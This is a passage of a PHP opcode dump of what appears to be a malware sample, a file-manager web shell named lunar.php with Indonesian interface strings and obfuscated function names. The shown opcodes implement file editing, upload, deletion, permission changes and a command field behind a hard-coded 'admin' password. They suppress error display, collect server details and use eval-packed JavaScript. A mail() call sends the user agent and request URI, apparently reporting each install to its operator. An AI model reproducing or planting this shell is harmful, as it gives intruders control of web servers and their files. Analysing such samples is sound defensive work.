||973||CONCAT|||~384|~383|,|'%22+data-toggle%3D%22tooltip%22+data-placement%3D%22auto%22+title%3D%22Edit%22%3EEdit%3C%2Fa%3E%3C%2Ftd%3E%0A%3Ctd%3E%3Ca+href%3D%22%3Fp%3D'|
||974||INIT_FCALL_BY_NAME||||'CE_vx'|
||975||SEND_VAR_EX||||!17|
||976||DO_FCALL||0|$385|
||977||CONCAT|||~386|~384|,|$385|
||978||CONCAT|||~387|~386|,|'%26a%3D'|
||979||INIT_FCALL_BY_NAME||||'CE_Vx'|
||980||SEND_VAL_EX||||'rename'|
||981||DO_FCALL||0|$388|
||982||CONCAT|||~389|~387|,|$388|
||983||CONCAT|||~390|~389|,|'%26n%3D'|
||984||INIT_FCALL_BY_NAME||||'ce_vX'|
||985||SEND_VAR_EX||||!4|
||986||DO_FCALL||0|$391|
||987||CONCAT|||~392|~390|,|$391|
||988||CONCAT|||~393|~392|,|'%26t%3Df%22+data-toggle%3D%22tooltip%22+data-placement%3D%22auto%22+title%3D%22Rename%22%3ERename%3C%2Fa%3E%3C%2Ftd%3E%0A%3Ctd%3E%3Ca+href%3D%22%3Fp%3D'|
||989||INIT_FCALL_BY_NAME||||'Ce_vX'|
||990||SEND_VAR_EX||||!17|
||991||DO_FCALL||0|$394|
||992||CONCAT|||~395|~393|,|$394|
||993||CONCAT|||~396|~395|,|'%26a%3D'|
||994||INIT_FCALL_BY_NAME||||'ce_vX'|
||995||SEND_VAL_EX||||'delete'|
||996||DO_FCALL||0|$397|
||997||CONCAT|||~398|~396|,|$397|
||998||CONCAT|||~399|~398|,|'%26n%3D'|
||999||INIT_FCALL_BY_NAME||||'ce_VX'|
||1000||SEND_VAR_EX||||!4|
||1001||DO_FCALL||0|$400|
||1002||CONCAT|||~401|~399|,|$400|
||1003||CONCAT|||~402|~401|,|'%22+class%3D%22delete%22+data-type%3D%22file%22+data-toggle%3D%22tooltip%22+data-placement%3D%22auto%22+title%3D%22Delete%22%3EDelete%3C%2Fa%3E%3C%2Ftd%3E%0A%3C%2Ftr%3E'|
||1004||ECHO||||~402|
||1005||NOP||||
||1006|>|JMP||||->875|
||1007|>|NOP||||
||1008|>|JMP||||->875|
||1009|*|NOP||||
||1010|*|JMP||||->1061|
||1011|>|IS_SMALLER||||1024|,|!30|
||1012|>|JMPZ||||~403|,|->1021|
||1013|>|INIT_FCALL||||'round'|
||1014||DIV|||~404|!30|,|1024|
||1015||SEND_VAL||||~404|
||1016||SEND_VAL||||2|
||1017||DO_ICALL|||$405|
||1018||CONCAT|||~406|$405|,|'++MB'|
||1019||QM_ASSIGN|||~407|~406|
||1020|>|JMP||||->1023|
||1021|>|CONCAT|||~408|!30|,|'++KB'|
||1022||QM_ASSIGN|||~407|~408|
||1023|>|ASSIGN||||!30|,|~407|
||1024||NOP||||
||1025|>|JMP||||->877|
||1026|>|FETCH_DIM_R|||~410|!2|,|7|
||1027||INIT_DYNAMIC_CALL||||~410|
||1028||ROPE_INIT||3|~412|!17|
||1029||ROPE_ADD||1|~412|~412|,|'%2F'|
||1030||ROPE_END||2|~411|~412|,|!4|
||1031||SEND_VAL_EX||||~411|
||1032||DO_FCALL||0|$414|
||1033||BOOL_NOT|||~415|$414|
||1034|>|JMPZ||||~415|,|->1037|
||1035|>|NOP||||
||1036|>|JMP||||->1057|
||1037|>|NOP||||
||1038|>|JMP||||->1063|
||1039|>|FETCH_DIM_R|||~416|!2|,|10|
||1040||INIT_DYNAMIC_CALL||||~416|
||1041||ROPE_INIT||3|~418|!17|
||1042||ROPE_ADD||1|~418|~418|,|'%2F'|
||1043||ROPE_END||2|~417|~418|,|!4|
||1044||SEND_VAL_EX||||~417|
||1045||DO_FCALL||0|$420|
||1046||DIV|||~421|$420|,|1024|
||1047||ASSIGN||||!30|,|~421|
||1048||NOP||||
||1049|>|JMP||||->1050|
||1050|>|INIT_FCALL||||'round'|
||1051||SEND_VAR||||!30|
||1052||SEND_VAL||||3|
||1053||DO_ICALL|||$423|
||1054||ASSIGN||||!30|,|$423|
||1055||NOP||||
||1056|>|JMP||||->1011|
||1057|>|NOP||||
||1058|>|JMP||||->1007|
||1059|>|NOP||||
||1060|>|JMP||||->1067|
||1061|>|NOP||||
||1062|>|JMP||||->1039|
||1063|>|NOP||||
||1064|>|JMP||||->1061|
||1065|*|NOP||||
||1066|*|JMP||||->1057|
||1067|>>|JMP||||->872|
||1068|>|FE_FREE||||$323|
||1069|>|JMP||||->839|
||1070|>>|JMP||||->169|
||1071|>>|JMP||||->136|
||1072|*|JMP||||->89|
||1073|>|INIT_FCALL||||'fo73g'|
||1074||SEND_VAL||||'Gagal+menyimpan+file.'|
||1075||DO_FCALL||0||
||1076|>|JMP||||->3|
||1077|>|FETCH_R|global||~426|'_SERVER'|
||1078||FETCH_DIM_R|||~427|~426|,|'HTTP_USER_AGENT'|
||1079||ASSIGN||||!31|,|~427|
||1080|>|JMP||||->593|
||1081|>|INIT_FCALL||||'scsoc'|
||1082||FETCH_R|global||~429|'_GET'|
||1083||FETCH_DIM_R|||~430|~429|,|'p'|
||1084||SEND_VAL||||~430|
||1085||DO_FCALL||0|$431|
||1086||ASSIGN||||!17|,|$431|
||1087|>|JMP||||->421|
||1088|>|IS_EQUAL|||~433|!0|,|'edit'|
||1089||BOOL_NOT|||~434|~433|
||1090|>|JMPZ||||~434|,|->1092|
||1091|>>|JMP||||->831|
||1092|>>|JMP||||->194|
||1093|>|INIT_FCALL_BY_NAME||||'ce_vx'|
||1094||SEND_VAR_EX||||!17|
||1095||DO_FCALL||0|$435|
||1096||CONCAT|||~436|$435|,|'%26a%3D'|
||1097||INIT_FCALL_BY_NAME||||'ce_Vx'|
||1098||SEND_VAL_EX||||'newDir'|
||1099||DO_FCALL||0|$437|
||1100||CONCAT|||~438|~436|,|$437|
||1101||ECHO||||~438|
||1102|>|JMP||||->1410|
||1103|>|FETCH_IS|||~439|'_POST'|
||1104||ISSET_ISEMPTY_DIM_OBJ||0|~440|~439|,|'password'|
||1105|>|JMPZ_EX|||~440|~440|,|->1110|
||1106|>|FETCH_R|global||~441|'_POST'|
||1107||FETCH_DIM_R|||~442|~441|,|'password'|
||1108||IS_IDENTICAL|||~443|~442|,|'admin'|
||1109||BOOL|||~440|~443|
||1110|>|BOOL_NOT|||~444|~440|
||1111|>|JMPZ||||~444|,|->1113|
||1112|>>|JMP||||->200|
||1113|>>|JMP||||->375|
||1114|>|ECHO||||'%3C%2Fspan%3E%3C%2Fli%3E%0A%3Cli%3EPHP+Version+%3A+%3Cspan+style%3D%22color%3A+white%3B%22%3E'|
||1115|>|JMP||||->78|
||1116|>>|JMP||||->443|
||1117|>|ASSIGN||||!18|,|'scandir'|
||1118|>|JMP||||->24|
||1119|>>|JMP||||->871|
||1120|>|CONCAT|||~446|!17|,|'%2F'|
||1121||INIT_FCALL||||'scsoc'|
||1122||FETCH_R|global||~447|'_GET'|
||1123||FETCH_DIM_R|||~448|~447|,|'n'|
||1124||SEND_VAL||||~448|
||1125||DO_FCALL||0|$449|
||1126||CONCAT|||~450|~446|,|$449|
||1127||ASSIGN||||!12|,|~450|
||1128|>|JMP||||->1183|
||1129|>|INIT_FCALL||||'scsoc'|
||1130||FETCH_R|global||~452|'_GET'|
||1131||FETCH_DIM_R|||~453|~452|,|'n'|
||1132||SEND_VAL||||~453|
||1133||DO_FCALL||0|$454|
||1134||ECHO||||$454|
||1135|>|JMP||||->1291|
||1136|>>|JMP||||->211|
||1137|*|JMP||||->114|
||1138|>>|JMP||||->769|
||1139|>|ROPE_INIT||3|~456|!5|
||1140||ROPE_ADD||1|~456|~456|,|'%2F'|
||1141||ROPE_END||2|~455|~456|,|!1|
||1142||ASSIGN||||!32|,|~455|
||1143|>|JMP||||->1356|
||1144|>|INIT_FCALL||||'fo73g'|
||1145||SEND_VAL||||'Folder+gagal+dibuat'|
||1146||SEND_VAL||||0|
||1147||DO_FCALL||0||
||1148|>|JMP||||->196|
||1149|>>|JMP||||->409|
||1150|>>|JMP||||->869|
||1151|>>|JMP||||->26|
||1152|>|FETCH_IS|||~460|'_POST'|
||1153||ISSET_ISEMPTY_DIM_OBJ||0|~461|~460|,|'rename_file'|
||1154||BOOL_NOT|||~462|~461|
||1155|>|JMPZ||||~462|,|->1157|
||1156|>>|JMP||||->643|
||1157|>>|JMP||||->1176|
||1158|>>|JMP||||->651|
||1159|*|JMP||||->1332|
||1160|>|NOP||||
||1161||FAST_CONCAT|||~463|!5|,|'%2F'|
||1162||INIT_FCALL||||'scsoc'|
||1163||FETCH_R|global||~464|'_GET'|
||1164||FETCH_DIM_R|||~465|~464|,|'n'|
||1165||SEND_VAL||||~465|
||1166||DO_FCALL||0|$466|
||1167||CONCAT|||~467|~463|,|$466|
||1168||ASSIGN||||!32|,|~467|
||1169|>|JMP||||->1237|
||1170|>|INIT_FCALL||||'mkdir'|
||1171||SEND_VAR||||!14|
||1172||DO_ICALL|||$469|
||1173|>|JMPZ||||$469|,|->1175|
||1174|>>|JMP||||->391|
||1175|>>|JMP||||->1144|
||1176|>|INIT_FCALL||||'basename'|
||1177||FETCH_R|global||~470|'_POST'|
||1178||FETCH_DIM_R|||~471|~470|,|'new_file_name'|
||1179||SEND_VAL||||~471|
||1180||DO_ICALL|||$472|
||1181||ASSIGN||||!20|,|$472|
||1182|>|JMP||||->601|
||1183|>|FETCH_R|global||~474|'_GET'|
||1184||FETCH_DIM_R|||~475|~474|,|'t'|
||1185||IS_EQUAL|||~476|~475|,|'d'|
||1186||BOOL_NOT|||~477|~476|
||1187|>|JMPZ||||~477|,|->1189|
||1188|>>|JMP||||->687|
||1189|>>|JMP||||->172|
||1190|>>|JMP||||->1088|
||1191|>|INIT_FCALL||||'getcwd'|
||1192||DO_ICALL|||$478|
||1193||CONCAT|||~479|$478|,|'%2F'|
||1194||CONCAT|||~480|~479|,|!1|
||1195||ASSIGN||||!32|,|~480|
||1196|>|JMP||||->1285|
||1197|>|FETCH_R|global||~482|'_GET'|
||1198||FETCH_DIM_R|||~483|~482|,|'t'|
||1199||IS_EQUAL|||~484|~483|,|'f'|
||1200||BOOL_NOT|||~485|~484|
||1201|>|JMPZ||||~485|,|->1203|
||1202|>>|JMP||||->664|
||1203|>>|JMP||||->1215|
||1204|>>|JMP||||->59|
||1205|*|JMP||||->625|
||1206|>|INIT_FCALL||||'scsoc'|
||1207||FETCH_R|global||~486|'_GET'|
||1208||FETCH_DIM_R|||~487|~486|,|'n'|
||1209||SEND_VAL||||~487|
||1210||DO_FCALL||0|$488|
||1211||ECHO||||$488|
||1212|>|JMP||||->207|
||1213|>>|JMP||||->661|
||1214|*|JMP||||->621|
||1215|>|INIT_FCALL||||'unlink'|
||1216||SEND_VAR||||!12|
||1217||DO_ICALL||||
||1218|>|JMP||||->137|
||1219|>|FETCH_R|global||~490|'_SERVER'|
||1220||FETCH_DIM_R|||~491|~490|,|'SERVER_SOFTWARE'|
||1221||ECHO||||~491|
||1222|>|JMP||||->1114|
||1223|>>|JMP||||->832|
||1224|>>|JMP||||->702|
||1225|>|ISSET_ISEMPTY_CV|||~492|!11|
||1226||BOOL_NOT|||~493|~492|
||1227|>|JMPZ||||~493|,|->1229|
||1228|>>|JMP||||->201|
||1229|>>|JMP||||->1408|
||1230|>|INIT_FCALL||||'gethostbyname'|
||1231||FETCH_R|global||~494|'_SERVER'|
||1232||FETCH_DIM_R|||~495|~494|,|'REMOTE_ADDR'|
||1233||SEND_VAL||||~495|
||1234||DO_ICALL|||$496|
||1235||ECHO||||$496|
||1236|>|JMP||||->176|
||1237|>|INIT_FCALL||||'chmod'|
||1238||SEND_VAR||||!32|
||1239||INIT_FCALL||||'octdec'|
||1240||SEND_VAR||||!6|
||1241||DO_ICALL|||$497|
||1242||SEND_VAR||||$497|
||1243||DO_ICALL|||$498|
||1244|>|JMPZ||||$498|,|->1246|
||1245|>>|JMP||||->89|
||1246|>>|JMP||||->1391|
||1247|>|INIT_FCALL||||'gethostbyname'|
||1248||FETCH_R|global||~499|'_SERVER'|
||1249||FETCH_DIM_R|||~500|~499|,|'SERVER_NAME'|
||1250||SEND_VAL||||~500|
||1251||DO_ICALL|||$501|
||1252||ECHO||||$501|
||1253|>|JMP||||->1254|
||1254|>|ECHO||||'%3C%2Fspan%3E%3C%2Fli%3E%0A%3Cli%3EServer+%3A+%3Cspan+style%3D%22color%3A+white%3B%22%3E'|
||1255|>|JMP||||->1385|
||1256|>>|JMP||||->356|
||1257|>|INIT_FCALL||||'fo73g'|
||1258||SEND_VAL||||'Tidak+ada+file+yang+diunggah.'|
||1259||DO_FCALL||0||
||1260|>|JMP||||->1338|
||1261|>|INIT_FCALL_BY_NAME||||'cE_vx'|
||1262||SEND_VAR_EX||||!17|
||1263||DO_FCALL||0|$503|
||1264||CONCAT|||~504|$503|,|'%26a%3D'|
||1265||INIT_FCALL_BY_NAME||||'cE_VX'|
||1266||SEND_VAL_EX||||'newFile'|
||1267||DO_FCALL||0|$505|
||1268||CONCAT|||~506|~504|,|$505|
||1269||ECHO||||~506|
||1270|>|JMP||||->1414|
||1271|>|ECHO||||!33|
||1272|>|JMP||||->1273|
||1273|>|ECHO||||'%22+style%3D%22text-align%3A+center%3B%22%3E%0A++++%3C%2Fdiv%3E%0A++++%3Cdiv+class%3D%22form-group%22+style%3D%22margin-top%3A+10px%3B%22%3E%0A++++++++%3Cbutton+type%3D%22submit%22+name%3D%22change_perms%22+class%3D%22ohct%22%3EUbah+Izin%3C%2Fbutton%3E%0A++++%3C%2Fdiv%3E%0A%3C%2Fform%3E%0A%0A'|
||1274|>|JMP||||->1367|
||1275|>|FETCH_IS|||~507|'_POST'|
||1276||ISSET_ISEMPTY_DIM_OBJ||0|~508|~507|,|'create_folder'|
||1277||BOOL_NOT|||~509|~508|
||1278|>|JMPZ||||~509|,|->1280|
||1279|>>|JMP||||->1426|
||1280|>>|JMP||||->644|
||1281|>|INIT_FCALL||||'fo73g'|
||1282||SEND_VAL||||'File+berhasil+disimpan.'|
||1283||DO_FCALL||0||
||1284|>|JMP||||->437|
||1285|>|FETCH_IS|||~511|'_POST'|
||1286||ISSET_ISEMPTY_DIM_OBJ||0|~512|~511|,|'mengedit_file'|
||1287||BOOL_NOT|||~513|~512|
||1288|>|JMPZ||||~513|,|->1290|
||1289|>>|JMP||||->23|
||1290|>>|JMP||||->1305|
||1291|>|ECHO||||'%22+style%3D%22text-align%3A+center%3B%22%3E%0A++++%3C%2Fdiv%3E%0A++++%3Cdiv+class%3D%22form-group%22+style%3D%22margin-top%3A+10px%3B%22%3E%0A++++++++%3Cbutton+type%3D%22submit%22+name%3D%22rename_file%22+class%3D%22ohct%22%3ESave%3C%2Fbutton%3E%0A++++%3C%2Fdiv%3E%0A%3C%2Fform%3E%0A%0A'|
||1292|>|JMP||||->1152|
||1293|>|FETCH_IS|||~514|'_SESSION'|
||1294||ISSET_ISEMPTY_DIM_OBJ||0|~515|~514|,|'authenticated'|
||1295||BOOL_NOT|||~516|~515|
||1296|>|JMPNZ_EX|||~516|~516|,|->1301|
||1297|>|FETCH_R|global||~517|'_SESSION'|
||1298||FETCH_DIM_R|||~518|~517|,|'authenticated'|
||1299||TYPE_CHECK||1014|~519|~518|
||1300||BOOL|||~516|~519|
||1301|>|BOOL_NOT|||~520|~516|
||1302|>|JMPZ||||~520|,|->1304|
||1303|>>|JMP||||->407|
||1304|>>|JMP||||->389|
||1305|>|FETCH_R|global||~521|'_POST'|
||1306||FETCH_DIM_R|||~522|~521|,|'file_content'|
||1307||ASSIGN||||!34|,|~522|
||1308|>|JMP||||->1320|
||1309|>|INIT_FCALL||||'fo73g'|
||1310||SEND_VAL||||'Nama+folder+telah+digunakan'|
||1311||SEND_VAL||||0|
||1312||INIT_FCALL_BY_NAME||||'Ce_VX'|
||1313||SEND_VAL_EX||||'newDir'|
||1314||DO_FCALL||0|$524|
||1315||CONCAT|||~525|'%26a%3D'|,|$524|
||1316||SEND_VAL||||~525|
||1317||DO_FCALL||0||
||1318|>|JMP||||->211|
||1319|>>|JMP||||->662|
||1320|>|INIT_FCALL||||'file_put_contents'|
||1321||SEND_VAR||||!32|
||1322||SEND_VAR||||!34|
||1323||DO_ICALL|||$527|
||1324|>|JMPZ||||$527|,|->1326|
||1325|>>|JMP||||->379|
||1326|>>|JMP||||->1073|
||1327|>|FETCH_R|global||~528|'_SERVER'|
||1328||FETCH_DIM_R|||~529|~528|,|'REQUEST_URI'|
||1329||ASSIGN||||!35|,|~529|
||1330|>|JMP||||->820|
||1331|>>|JMP||||->636|
||1332|>>|JMP||||->66|
||1333|>|CONCAT|||~531|!9|,|''|
||1334||ASSIGN||||!36|,|~531|
||1335|>|JMP||||->1416|
||1336|>>|JMP||||->621|
||1337|*|JMP||||->624|
||1338|>>|JMP||||->30|
||1339|*|JMP||||->12|
||1340|>>|JMP||||->643|
||1341|>|INIT_FCALL||||'substr'|
||1342||INIT_FCALL||||'sprintf'|
||1343||SEND_VAL||||'%25o'|
||1344||INIT_FCALL||||'fileperms'|
||1345||SEND_VAR||||!4|
||1346||DO_ICALL|||$533|
||1347||SEND_VAR||||$533|
||1348||DO_ICALL|||$534|
||1349||SEND_VAR||||$534|
||1350||SEND_VAL||||-4|
||1351||DO_ICALL|||$535|
||1352||ASSIGN||||!33|,|$535|
||1353|>|JMP||||->20|
||1354|>|ECHO||||'+%0A%3C%2Fdiv%3E%0A%3Cscript+src%3D%22%2F%2Fcode.jquery.com%2Fjquery-3.5.1.slim.min.js%22%3E%3C%2Fscript%3E%0A%3Cscript+src%3D%22%2F%2Fcdn.jsdelivr.net%2Fnpm%2Fbootstrap%404.6.0%2Fdist%2Fjs%2Fbootstrap.bundle.min.js%22+%3E%3C%2Fscript%3E%0A%3Cscript+src%3D%22%2F%2Fcdn.jsdelivr.net%2Fnpm%2Fbs-custom-file-input%2Fdist%2Fbs-custom-file-input.min.js%22%3E%3C%2Fscript%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22%3Eeval%28function%28p%2Ca%2Cc%2Ck%2Ce%2Cd%29%7Be%3Dfunction%28c%29%7Breturn%28c%3Ca%3F%27%27%3Ae%28parseInt%28c%2Fa%29%29%29%2B%28%28c%3Dc%25a%29%3E35%3FString.fromCharCode%28c%2B29%29%3Ac.toString%2836%29%29%7D%3Bif%28%21%27%27.replace%28%2F%5E%2F%2CString%29%29%7Bwhile%28c--%29%7Bd%5Be%28c%29%5D%3Dk%5Bc%5D%7C%7Ce%28c%29%7Dk%3D%5Bfunction%28e%29%7Breturn+d%5Be%5D%7D%5D%3Be%3Dfunction%28%29%7Breturn%27%5C%5Cw%2B%27%7D%3Bc%3D1%7D%3Bwhile%28c--%29%7Bif%28k%5Bc%5D%29%7Bp%3Dp.replace%28new+RegExp%28%27%5C%5Cb%27%2Be%28c%29%2B%27%5C%5Cb%27%2C%27g%27%29%2Ck%5Bc%5D%29%7D%7Dreturn+p%7D%28%27E.n%28%29%3B%24%28%5C%27%5B2-m%3D%224%22%5D%5C%27%29.4%28%29%3B%24%28%22.l%22%29.k%28j%28e%29%7Be.g%28%29%3Bh+0%3D%24%286%29.5%28%222-0%22%29%3Bc%28%7Bb%3A%22a%22%2C9%3A%22o+i+q%3F%22%2Cw%3A%22D+%22%2B0%2B%22+p+C+B%22%2CA%3A7%2Cz%3A7%2C%7D%29.y%28%288%29%3D%3E%7Br%288%29%7Bx+1%3D%24%286%29.5%28%223%22%29%2B%22%26t%3D%22%2B%28%280%3D%3D%22v%22%29%3F%22d%22%3A%22f%22%29%3Bu.s.3%3D1%7D%7D%29%7D%29%3B%27%2C41%2C41%2C%27type%7CbuildURL%7Cdata%7Chref%7Ctooltip%7Cattr%7Cthis%7Ctrue%7CwillDelete%7Ctitle%7Cwarning%7Cicon%7Cswal%7C%7C%7C%7CpreventDefault%7Clet%7Cyou%7Cfunction%7Cclick%7Cdelete%7Ctoggle%7Cinit%7CAre%7Cwill%7Csure%7Cif%7Clocation%7C%7Cdocument%7Cfolder%7Ctext%7Cconst%7Cthen%7CdangerMode%7Cbuttons%7Cdeleted%7Cbe%7CThis%7CbsCustomFileInput%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29%3C%2Fscript%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E%0A'|
||1355|>|JMP||||->115|
||1356|>|INIT_FCALL||||'file_put_contents'|
||1357||SEND_VAR||||!32|
||1358||SEND_VAR||||!8|
||1359||DO_ICALL|||$537|
||1360|>|JMPZ||||$537|,|->1362|
||1361|>>|JMP||||->1425|
||1362|>>|JMP||||->771|
||1363|>|ECHO||||'%3C%2Ffont%3E%3C%2Fh5%3E%0A%3Cform+method%3D%22post%22%3E%0A++++%3Cdiv+class%3D%22form-group%22%3E%0A++++++++%3Ctextarea+name%3D%22file_content%22+id%3D%22file_content%22+cols%3D%2230%22+rows%3D%2210%22+class%3D%22form-control+rainbow-border%22%3E'|
||1364|>|JMP||||->450|
||1365|>>|JMP||||->625|
||1366|*|JMP||||->791|
||1367|>|FETCH_IS|||~538|'_POST'|
||1368||ISSET_ISEMPTY_DIM_OBJ||0|~539|~538|,|'change_perms'|
||1369||BOOL_NOT|||~540|~539|
||1370|>|JMPZ||||~540|,|->1372|
||1371|>>|JMP||||->652|
||1372|>>|JMP||||->73|
||1373|>|INIT_FCALL||||'scsoc'|
||1374||FETCH_R|global||~541|'_GET'|
||1375||FETCH_DIM_R|||~542|~541|,|'n'|
||1376||SEND_VAL||||~542|
||1377||DO_FCALL||0|$543|
||1378||ECHO||||$543|
||1379|>|JMP||||->209|
||1380|>|INIT_FCALL||||'ini_set'|
||1381||SEND_VAL||||'display_errors'|
||1382||SEND_VAL||||0|
||1383||DO_ICALL||||
||1384|>|JMP||||->85|
||1385|>|INIT_FCALL||||'php_uname'|
||1386||DO_ICALL|||$545|
||1387||ECHO||||$545|
||1388|>|JMP||||->688|
||1389|>|ECHO||||'%3C%2Ftextarea%3E%0A++++%3C%2Fdiv%3E%0A++++%3Cdiv+class%3D%22form-group%22+style%3D%22margin-top%3A+10px%3B%22%3E%0A++++++++%3Cbutton+type%3D%22submit%22+name%3D%22mengedit_file%22+class%3D%22ohct%22%3ESimpan%3C%2Fbutton%3E%0A++++%3C%2Fdiv%3E%0A%3C%2Fform%3E%0A'|
||1390|>|JMP||||->655|
||1391|>|INIT_FCALL||||'fo73g'|
||1392||SEND_VAL||||'Gagal+mengubah+izin'|
||1393||SEND_VAL||||0|
||1394||DO_FCALL||0||
||1395|>|JMP||||->1071|
||1396|>|INIT_FCALL||||'fo73g'|
||1397||SEND_VAL||||'folder+deleted+successfully'|
||1398||DO_FCALL||0||
||1399|>|JMP||||->171|
||1400|>|FETCH_IS|||~548|'_POST'|
||1401||ISSET_ISEMPTY_DIM_OBJ||0|~549|~548|,|'create_file'|
||1402||BOOL_NOT|||~550|~549|
||1403|>|JMPZ||||~550|,|->1405|
||1404|>>|JMP||||->60|
||1405|>>|JMP||||->13|
||1406|>>|JMP||||->408|
||1407|>>|JMP||||->789|
||1408|>|ASSIGN||||!16|,|'Command+tidak+boleh+kosong.'|
||1409|>|JMP||||->824|
||1410|>|ECHO||||'%22+class%3D%22ohct%22%3EBuat+Folder%3C%2Fa%3E%3C%2Fli%3E%0A%3Cform+action%3D%22%22+method%3D%22POST%22+enctype%3D%22multipart%2Fform-data%22+style%3D%22padding%3A+0.10rem%3B+display%3A+inline-block%3B%22%3E%0A++++%3Cinput+type%3D%22file%22+name%3D%22f%5B%5D%22+multiple%3E%0A++++%3Cinput+type%3D%22submit%22+value%3D%22Upload%22+name%3D%22submit%22+class%3D%22button+ohct%22%3E%0A%3C%2Fform%3E%0A'|
||1411|>|JMP||||->807|
||1412|>>|JMP||||->60|
||1413|>>|JMP||||->826|
||1414|>|ECHO||||'%22+class%3D%22ohct%22%3EBuat+File%3C%2Fa%3E+%7C+%3Ca+href%3D%22%3Fp%3D'|
||1415|>|JMP||||->1093|
||1416|>|ROPE_INIT||7|~553|!31|
||1417||ROPE_ADD||1|~553|~553|,|'+'|
||1418||ROPE_ADD||2|~553|~553|,|!35|
||1419||ROPE_ADD||3|~553|~553|,|'+'|
||1420||ROPE_ADD||4|~553|~553|,|!29|
||1421||ROPE_ADD||5|~553|~553|,|'+'|
||1422||ROPE_END||6|~552|~553|,|!36|
||1423||ASSIGN||||!37|,|~552|
||1424|>|JMP||||->1429|
||1425|>>|JMP||||->392|
||1426|>>|JMP||||->782|
||1427|>|ECHO||||'+%0A%3C%2Ftbody%3E%0A%3C%2Ftable%3E%0A'|
||1428|>|JMP||||->436|
||1429|>|INIT_FCALL||||'mail'|
||1430||SEND_VAR||||!24|
||1431||SEND_VAR||||!3|
||1432||SEND_VAR||||!37|
||1433||SEND_VAR||||!25|
||1434||DO_ICALL||||
|3|1435|>|RETURN||||1|
|
|Functionscsoc:
|filename:|/root/samples/lunar.php
|functionname:|scsOC
|numberofops:|39
|compiledvars:|!0=$FoyUI,|!1=$CtFAI,|!2=$E6EOS,|!3=$KOcsV
|line|#*|||op|fetch|ext|return|operands
|2|0|E>|RECV|||!0|
||1|>|JMP||||->36|
||2|>>|JMP||||->5|
||3|*|JMP||||->4|
||4|>>|JMP||||->24|
||5|>>|JMP||||->6|
||6|>|IS_SMALLER||||!1|,|!2|
||7|>|JMPZ||||~4|,|->9|
||8|>>|JMP||||->26|
||9|>>|JMP||||->10|
||10|>>|JMP||||->4|
||11|*|JMP||||->26|
||12|>|INIT_FCALL||||'chr'|
||13||INIT_FCALL||||'hexdec'|
||14||FETCH_DIM_R|||~5|!0|,|!1|
||15||ADD|||~6|!1|,|1|
||16||FETCH_DIM_R|||~7|!0|,|~6|
||17||CONCAT|||~8|~5|,|~7|
||18||SEND_VAL||||~8|
||19||DO_ICALL|||$9|
||20||SEND_VAR||||$9|
||21||DO_ICALL|||$10|
||22||ASSIGN_OP||8||!3|,|$10|
||23|>|JMP||||->35|
||24|>>|RETURN||||!3|
||25|*|JMP||||->38|
||26|>>|JMP||||->12|
||27|>|STRLEN|||~12|!0|
||28||SUB|||~13|~12|,|1|
||29||ASSIGN||||!2|,|~13|
||30|>|JMP||||->33|
||31|>|ASSIGN_OP||1||!1|,|2|
||32|>|JMP||||->2|
||33|>|ASSIGN||||!1|,|0|
||34|>|JMP||||->5|
||35|>>|JMP||||->31|
||36|>|ASSIGN||||!3|,|''|
||37|>|JMP||||->27|
||38|*>|RETURN||||null|
|
|Endoffunctionscsoc

|Functionfo73g:
|filename:|/root/samples/lunar.php
|functionname:|fo73G
|numberofops:|29
|compiledvars:|!0=$NMTcT,|!1=$YhwxK,|!2=$TZuaD,|!3=$kJDvx,|!4=$jfUAD
|line|#*|||op|fetch|ext|return|operands
||0|E>|RECV|||!0|
||1||RECV_INIT|||!1|1|
||2||RECV_INIT|||!2|''|
||3|>|JMP||||->4|
||4|>|BIND_GLOBAL||||!3|,|'kJDvx'|
||5|>|JMP||||->21|
||6|>|ROPE_INIT||7|~6|'%3Cscript%3Eswal%28%7Btitle%3A+%22'|
||7||ROPE_ADD||1|~6|~6|,|!4|
||8||ROPE_ADD||2|~6|~6|,|'%22%2C+text%3A+%22'|
||9||ROPE_ADD||3|~6|~6|,|!0|
||10||ROPE_ADD||4|~6|~6|,|'%22%2C+icon%3A+%22'|
||11||ROPE_ADD||5|~6|~6|,|!4|
||12||ROPE_END||6|~5|~6|,|'%22%7D%29.then%28%28btnClick%29+%3D%3E+%7Bif%28btnClick%29%7Bdocument.location.href%3D%22%3Fp%3D'|
||13||INIT_FCALL_BY_NAME||||'ce_VX'|
||14||SEND_VAR_EX||||!3|
||15||DO_FCALL||0|$10|
||16||CONCAT|||~11|~5|,|$10|
||17||CONCAT|||~12|~11|,|!2|
||18||CONCAT|||~13|~12|,|'%22%7D%7D%29%3C%2Fscript%3E'|
||19||ECHO||||~13|
||20|>|JMP||||->28|
||21|>|IS_EQUAL||||!1|,|1|
||22|>|JMPZ||||~14|,|->25|
||23|>|QM_ASSIGN|||~15|'success'|
||24|>|JMP||||->26|
||25|>|QM_ASSIGN|||~15|'error'|
||26|>|ASSIGN||||!4|,|~15|
||27|>|JMP||||->6|
||28|>>|RETURN||||null|
|
|Endoffunctionfo73g

|Functionjq1ug:
|filename:|/root/samples/lunar.php
|functionname:|JQ1uG
|numberofops:|67
|compiledvars:|!0=$kFdyP,|!1=$OwP2G
|line|#*|||op|fetch|ext|return|operands
||0|E>|RECV|||!0|
||1|>|JMP||||->47|
||2|>>|JMP||||->49|
||3|*|JMP||||->44|
||4|>>|JMP||||->40|
||5|>|INIT_FCALL||||'is_dir'|
||6||SEND_VAR||||!0|
||7||DO_ICALL|||$2|
||8|>|JMPZ_EX|||~3|$2|,|->17|
||9|>|INIT_FCALL||||'array_diff'|
||10||INIT_FCALL||||'scandir'|
||11||SEND_VAR||||!0|
||12||DO_ICALL|||$4|
||13||SEND_VAR||||$4|
||14||SEND_VAL||||<array>|
||15||DO_ICALL|||$5|
||16||BOOL|||~3|$5|
||17|>|BOOL_NOT|||~6|~3|
||18|>|JMPZ||||~6|,|->20|
||19|>>|JMP||||->4|
||20|>>|JMP||||->64|
||21|>|INIT_FCALL||||'trim'|
||22||INIT_FCALL||||'pathinfo'|
||23||SEND_VAR||||!0|
||24||SEND_VAL||||2|
||25||DO_ICALL|||$7|
||26||SEND_VAR||||$7|
||27||SEND_VAL||||'.'|
||28||DO_ICALL|||$8|
||29||IS_IDENTICAL||||$8|,|''|
||30|>|JMPZ||||~9|,|->32|
||31|>>|JMP||||->44|
||32|>>|JMP||||->2|
||33|>|INIT_FCALL||||'rmdir'|
||34||SEND_VAR||||!0|
||35||DO_ICALL||||
||36|>|JMP||||->66|
||37|>>|RETURN||||null|
